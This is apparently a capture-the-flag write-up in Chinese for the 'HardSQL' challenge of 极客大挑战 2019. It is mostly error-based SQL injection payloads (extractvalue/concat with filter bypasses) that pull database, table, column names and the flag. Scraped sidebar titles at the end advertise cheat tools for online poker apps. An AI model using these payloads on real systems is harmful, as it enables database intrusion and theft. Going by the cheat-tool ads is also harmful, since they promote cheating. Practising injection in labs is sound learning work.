[极客大挑战 2019]HardSQL1
创始人
2024-11-16 01:34:54
0

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23  /check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

相关内容

热门资讯

基于单片机的防火防盗报警系统设... 摘要:该多功能防火防盗系统既具有根据环境温度和烟雾浓度进行火灾检测的功能,...
unity中实现流光效果——世... Properties { _MainTex ("Texture", 2D) ...
8分钟了解(AA扑克)到底有外... 8分钟了解(AA扑克)到底有外挂(辅助挂)辅助挂(有挂办法)周密教程(哔哩哔哩)是一款可以让一直输的...
一分钟了解(wepoke)发牌... 一分钟了解(wepoke)发牌逻辑(有辅助挂)透视(有挂教学)透彻教程(哔哩哔哩)详细攻略(小薇48...
分享一款(AA poker)号... 分享一款(AA poker)号一直输(辅助)透明挂(有挂方式)具体教程(哔哩哔哩);WPK必备黑科技...
玩家交流(wpk微扑克)辅助器... 玩家交流(wpk微扑克)辅助器ios(透明挂)透视(有挂教程)具体教程(哔哩哔哩);本章节将是从实际...
Excel函数基础(二) 1、单元格名称框选单元格(不含标题),公式选项卡->定义名...
Shell编程——基础语法(2... 文章目录基础语法(2)echo命令read命令printf命令test命...
C++面试---小米 一、static 关键字的作用,及和const的区别 static关键字作用ÿ...
git使用及代码规范 参考链接git flow 简介代码审核的典型问题gitlab工作流